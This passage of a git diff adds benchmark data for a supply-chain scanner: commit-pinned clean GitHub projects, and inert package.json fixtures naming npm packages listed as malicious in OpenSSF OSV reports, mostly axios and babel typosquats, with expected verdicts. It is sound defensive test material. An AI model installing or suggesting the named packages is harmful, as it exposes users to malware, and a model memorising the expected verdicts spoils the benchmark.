"main" + }, + { + "sampleId": "noisy-oven-sh-bun", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/oven-sh/bun", + "immutableRef": "8f1a9540fdff25410506de76e0da2506d260c08f", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "oven-sh/bun", + "ref": "8f1a9540fdff25410506de76e0da2506d260c08f" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-tauri-apps-tauri", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/tauri-apps/tauri", + "immutableRef": "f5347cd70838c027040acb4a66733a2470f20ae4", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "tauri-apps/tauri", + "ref": "f5347cd70838c027040acb4a66733a2470f20ae4" + }, + "defaultBranchAtPin": "dev" + }, + { + "sampleId": "noisy-puppeteer-puppeteer", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/puppeteer/puppeteer", + "immutableRef": "5f5f931a0f2bc64bfb30039c507d763ce044c263", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "puppeteer/puppeteer", + "ref": "5f5f931a0f2bc64bfb30039c507d763ce044c263" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-microsoft-typescript", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/microsoft/TypeScript", + "immutableRef": "637d5746b70257028fb95aad32ddec6b26ab0a14", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "microsoft/TypeScript", + "ref": "637d5746b70257028fb95aad32ddec6b26ab0a14" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-npm-cli", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/npm/cli", + "immutableRef": "7b1f6c173d17b3bf30e45426f6df39473c6a1163", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "npm/cli", + "ref": "7b1f6c173d17b3bf30e45426f6df39473c6a1163" + }, + "defaultBranchAtPin": "latest" + }, + { + "sampleId": "noisy-homebrew-brew", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/Homebrew/brew", + "immutableRef": "76ca8d74e4a180badad438bf245ddfc740d68a8e", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "Homebrew/brew", + "ref": "76ca8d74e4a180badad438bf245ddfc740d68a8e" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-python-cpython", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/python/cpython", + "immutableRef": "1fece4457032382947c7c2a5c9e95dc106ca7a7d", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "python/cpython", + "ref": "1fece4457032382947c7c2a5c9e95dc106ca7a7d" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-django-django", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/django/django", + "immutableRef": "bdbda29c3e126754c3ae04ceb5c5d35d49aae01c", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "django/django", + "ref": "bdbda29c3e126754c3ae04ceb5c5d35d49aae01c" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-ansible-ansible", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ansible/ansible", + "immutableRef": "8d63341579aa1c62024f3bce1a8af3f9a1b22a16", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "ansible/ansible", + "ref": "8d63341579aa1c62024f3bce1a8af3f9a1b22a16" + }, + "defaultBranchAtPin": "devel" + }, + { + "sampleId": "noisy-scrapy-scrapy", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/scrapy/scrapy", + "immutableRef": "c9446931a80e63ea1d77e130ea5581b547e0f51b", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "scrapy/scrapy", + "ref": "c9446931a80e63ea1d77e130ea5581b547e0f51b" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "noisy-pallets-flask", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pallets/flask", + "immutableRef": "36e4a824f340fdee7ed50937ba8e7f6bc7d17f81", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "pallets/flask", + "ref": "36e4a824f340fdee7ed50937ba8e7f6bc7d17f81" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-rust-lang-rust", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/rust-lang/rust", + "immutableRef": "5503df87342a73d0c29126a7e08dc9c1255c46ad", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "rust-lang/rust", + "ref": "5503df87342a73d0c29126a7e08dc9c1255c46ad" + }, + "defaultBranchAtPin": "main" + }, + { + "sampleId": "noisy-golang-go", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/golang/go", + "immutableRef": "03845e30f7b73d1703bd8c21017297f6eecb76d6", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "github", + "repo": "golang/go", + "ref": "03845e30f7b73d1703bd8c21017297f6eecb76d6" + }, + "defaultBranchAtPin": "master" + }, + { + "sampleId": "malicious-osv-mal-2024-8862", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2024-8862\",\"private\":true,\"dependencies\":{\"bcrypts-js\":\"2.4.4\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2024-1377", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2024-1377\",\"private\":true,\"dependencies\":{\"cors-parser\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-19413", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-19413\",\"private\":true,\"dependencies\":{\"electorn\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-20690", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-20690\",\"private\":true,\"dependencies\":{\"flatmap-stream\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-25502", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-25502\",\"private\":true,\"dependencies\":{\"lodahs\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-4275", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-4275\",\"private\":true,\"dependencies\":{\"axios.js\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2026-4493", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2026-4493\",\"private\":true,\"dependencies\":{\"axiosqqq\":\"1.16.2\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15242", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15242\",\"private\":true,\"dependencies\":{\"axioss\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15281", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15281\",\"private\":true,\"dependencies\":{\"babel-laoder\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15282", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15282\",\"private\":true,\"dependencies\":{\"babel-loadre\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15283", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15283\",\"private\":true,\"dependencies\":{\"babel-loqder\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15286", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15286\",\"private\":true,\"dependencies\":{\"babel-node\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15289", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15289\",\"private\":true,\"dependencies\":{\"babel-pal\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15238", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15238\",\"private\":true,\"dependencies\":{\"axios-http\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2023-116", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2023-116\",\"private\":true,\"dependencies\":{\"axios-proxy\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-4813", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-4813\",\"private\":true,\"dependencies\":{\"axios-browserify\":\"1.0.0\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-190832", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-190832\",\"private\":true,\"dependencies\":{\"axios-builder\":\"1.2.1\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2024-10692", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2024-10692\",\"private\":true,\"dependencies\":{\"axios-mockadptr\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-191389", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-191389\",\"private\":true,\"dependencies\":{\"axios-cancelable\":\"1.0.1\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2026-2631", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2026-2631\",\"private\":true,\"dependencies\":{\"babel-plugin-blocks\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-47613", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-47613\",\"private\":true,\"dependencies\":{\"babel-ganache\":\"2.2.4\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2026-407", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2026-407\",\"private\":true,\"dependencies\":{\"babel-js\":\"1.0.1\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15287", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15287\",\"private\":true,\"dependencies\":{\"babel-npm-install\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-15288", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-15288\",\"private\":true,\"dependencies\":{\"babel-npm-publish\":\"*\"}}\n" + } + } + }, + { + "sampleId": "malicious-osv-mal-2025-3985", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"flagrix-inert-mal-2025-3985\",\"private\":true,\"dependencies\":{\"babel-loader-fs\":\"*\"}}\n" + } + } + } + ], + "pinnedAt": "2026-07-13T11:45:32.366Z", + "sourceCorpusSha256": "e070f43e6cee4d783ec4fc5695b6f1aa6d920e434c8bfbb7c15ce67f809ffdc3" +} diff --git a/benchmark/github-projects.json b/benchmark/github-projects.json new file mode 100644 index 0000000..3b1d7ad --- /dev/null +++ b/benchmark/github-projects.json @@ -0,0 +1,34 @@ +{ + "projects": [ + { "repo": "hapijs/hapi", "corpus": "reference-clean" }, + { "repo": "reduxjs/redux", "corpus": "reference-clean" }, + { "repo": "reduxjs/redux-toolkit", "corpus": "reference-clean" }, + { "repo": "immerjs/immer", "corpus": "reference-clean" }, + { "repo": "date-fns/date-fns", "corpus": "reference-clean" }, + { "repo": "ramda/ramda", "corpus": "reference-clean" }, + { "repo": "sindresorhus/got", "corpus": "reference-clean" }, + { "repo": "socketio/socket.io", "corpus": "reference-clean" }, + { "repo": "apollographql/apollo-client", "corpus": "reference-clean" }, + { "repo": "TanStack/query", "corpus": "reference-clean" }, + { "repo": "testing-library/react-testing-library", "corpus": "reference-clean" }, + { "repo": "prisma/prisma", "corpus": "reference-clean" }, + { "repo": "tailwindlabs/tailwindcss", "corpus": "reference-clean" }, + { "repo": "prettier/prettier", "corpus": "reference-clean" }, + { "repo": "eslint/eslint", "corpus": "reference-clean" }, + { "repo": "pnpm/pnpm", "corpus": "reference-clean" }, + { "repo": "denoland/deno", "corpus": "noisy-legitimate" }, + { "repo": "oven-sh/bun", "corpus": "noisy-legitimate" }, + { "repo": "tauri-apps/tauri", "corpus": "noisy-legitimate" }, + { "repo": "puppeteer/puppeteer", "corpus": "noisy-legitimate" }, + { "repo": "microsoft/TypeScript", "corpus": "noisy-legitimate" }, + { "repo": "npm/cli", "corpus": "noisy-legitimate" }, + { "repo": "Homebrew/brew", "corpus": "noisy-legitimate" }, + { "repo": "python/cpython", "corpus": "noisy-legitimate" }, + { "repo": "django/django", "corpus": "noisy-legitimate" }, + { "repo": "ansible/ansible", "corpus": "noisy-legitimate" }, + { "repo": "scrapy/scrapy", "corpus": "noisy-legitimate" }, + { "repo": "pallets/flask", "corpus": "noisy-legitimate" }, + { "repo": "rust-lang/rust", "corpus": "noisy-legitimate" }, + { "repo": "golang/go", "corpus": "noisy-legitimate" } + ] +} diff --git a/benchmark/osv-malicious-packages.json b/benchmark/osv-malicious-packages.json new file mode 100644 index 0000000..b51aa69 --- /dev/null +++ b/benchmark/osv-malicious-packages.json @@ -0,0 +1,35 @@ +{ + "source": { + "repository": "ossf/malicious-packages", + "commit": "1fcca18f1775b47bd272362330684aa2dd1ad870", + "ecosystem": "npm", + "scope": "osv/malicious/npm (withdrawn and unmergable reports excluded)" + }, + "packages": [ + { "name": "bcrypts-js", "version": "2.4.4", "reportId": 